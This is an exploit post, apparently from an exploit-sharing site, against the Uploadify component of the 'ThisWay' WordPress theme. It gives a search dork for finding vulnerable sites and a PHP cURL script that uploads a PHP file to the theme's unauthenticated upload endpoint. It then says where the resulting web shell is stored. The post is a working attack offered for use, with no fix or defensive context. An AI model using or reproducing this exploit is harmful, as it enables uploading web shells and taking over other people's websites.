Assalamuallaikum Wr.Wb
- #Author: Bet0
- #Dork: inurl:"/wp-content/themes/ThisWay/"
- #Type: CSRF & Xampp ,Uploadify
- #Tested:-
- #CMS:WordPress
- 1337day
<?php
$uploadfile="Ical.php";
$ch = curl_init("IcalSadega.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Location : /wp-content/uploads/[year]/[month]/randomname.php